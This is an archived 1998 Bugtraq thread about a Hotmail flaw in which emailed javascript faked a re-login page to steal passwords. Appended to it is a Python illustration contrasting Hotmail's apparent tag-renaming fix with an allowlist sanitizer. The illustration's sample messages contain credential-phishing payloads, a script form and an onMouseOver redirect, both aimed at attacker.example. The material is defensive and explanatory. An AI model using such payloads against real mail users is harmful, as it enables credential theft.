List: bugtraq
Subject: Re: Serious Security Hole in Hotmail
From: "Jonathan A. Zdziarski - Systems Administrator" <jonz () CARTMAN ! NETRAIL ! NET>
Date: 1998-08-25 20:31:47
It appears that Hotmail put a fix in for this by s/<script>/<comment>/ or
some variation, when you view a message.
On Tue, 25 Aug 1998, Jeff Mcadams wrote:
> Thus spake Tom Cervenka
>
> >We have just found a serious security hole in Microsoft's Hotmail
> >service (http://www.hotmail.com) which allows malicious users to easily
> >steal the passwords of Hotmail users. The exploit involves sending an
> >e-mail message that contains embedded javascript code. When a Hotmail
> >user views the message, the javascript code forces the user to re-login
> >to Hotmail. In doing so, the victim's username and password is sent to
> >the malicious user by e-mail. (see
> >http://www.because-we-can.com/hotmail/default.htm for demo)
>
> This is a variation on the Spartan Horse announced by Dan Gregorie over
> a week ago, and covered on news.com on the 14th. The Spartan Horse is
> available for viewing at:
> http://www.thetopoftheworld.com
> The news.com article is at:
> http://www.news.com/News/Item/0,4,25274,00.html?st.ne.fd.gif.d
>
> The variation is that the Spartan Horse, as designed on the
> www.thetopoftheworld.com site, mimics the Windows95/98
> Dial-Up-Networking dialog box.
>
> This wasn't originally sent to BUGTRAQ because it doesn't exploit a
> specific flaw in programming code in any software, like this "Hot"Mail
> exploit. Perhaps that was an oversight on Dan's and my part, but I
> did want to set the record straight on the origination of this idea for
> Dan's sake.
> --
> Jeff McAdams Email: jeffm@iglou.com
> Head Network Administrator Voice: (502) 966-3848
> IgLou Internet Services (800) 436-4456
>
Thank you,
Jonathan A. Zdziarski
Senior Systems Administrator
Netrail, Inc.
888.NET.RAIL x242
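The reply above describes the fix only as "s/<script>/<comment>/ or some variation", so the following is an added illustration, not Hotmail's code and not anything posted in this thread. It takes that substitution literally as a string replacement and places it beside the approach a webmail filter would normally take, re-serialising untrusted HTML through an allowlist of elements and attributes, with the body of any <script> element dropped rather than renamed. The two sample messages, the host attacker.example, and the function names naive_fix and sanitize are all constructed for the example; the second sample, which carries no <script> element at all, only shows what a substitution keyed on that one tag never examines, and says nothing about what Hotmail's deployed filter actually did.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample messages (not from the thread). The first mirrors the
# attack the thread describes: inline script that rewrites the mail view into
# a fake login form posting to an attacker-controlled host (attacker.example
# is a placeholder).
SCRIPT_MESSAGE = (
    "<html><body>\n"
    "<p>Your session has expired, please log in again.</p>\n"
    "<script>document.write('<form action=\"http://attacker.example/steal\">')</script>\n"
    "<a href=\"http://www.hotmail.com/\">Hotmail</a>\n"
    "</body></html>"
)

# Second constructed sample: no <script> element, just an event-handler
# attribute and a javascript: URL, i.e. markup a tag-only substitution
# never looks at.
HANDLER_MESSAGE = (
    "<p>Please <a href=\"http://www.hotmail.com/\" "
    "onMouseOver=\"window.location='http://attacker.example/login'\">re-login</a> "
    "or <a href=\"javascript:void(0)\">here</a>.</p>"
)


def naive_fix(markup):
    """The substitution the reply describes, taken literally: s/<script>/<comment>/.

    It only touches the exact lowercase string "<script>"; the script body,
    attributes and everything else in the message pass through unchanged.
    """
    return markup.replace("<script>", "<comment>")


# Allowlist policy (assumed for the example): only these elements and
# attributes survive; script/style content is dropped entirely.
ALLOWED_TAGS = {"html", "body", "p", "br", "b", "i", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_URL = re.compile(r"^(https?|mailto):", re.IGNORECASE)


class AllowlistSanitizer(HTMLParser):
    """Re-serialise only allowlisted markup; everything else becomes nothing."""

    def __init__(self):
        super().__init__()
        self.out = []
        self.skip_depth = 0  # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:  # HTMLParser lower-cases names for us
            # Drop every on* handler and anything outside the per-tag allowlist.
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            value = (value or "").strip()
            if name == "href" and not SAFE_URL.match(value):
                continue
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        # Text inside script/style is discarded; all other text is re-escaped.
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))

    # Comments, doctype and processing instructions hit HTMLParser's default
    # no-op handlers, so they are dropped as well.


def sanitize(markup):
    """Return the allowlisted rendering of an untrusted HTML mail body."""
    parser = AllowlistSanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    for label, msg in (("script", SCRIPT_MESSAGE), ("handler", HANDLER_MESSAGE)):
        print("== %s: naive ==\n%s" % (label, naive_fix(msg)))
        print("== %s: allowlist ==\n%s\n" % (label, sanitize(msg)))
```

On the first sample the literal substitution leaves the script body in the page as the content of an unknown <comment> element, which is exactly the property a filter relies on when it renames rather than removes; the allowlist version emits no trace of it. On the second sample the substitution is a no-op because there is no "<script>" string to match, while the allowlist parser still strips the onMouseOver handler and the javascript: href because it decides per attribute rather than per tag name.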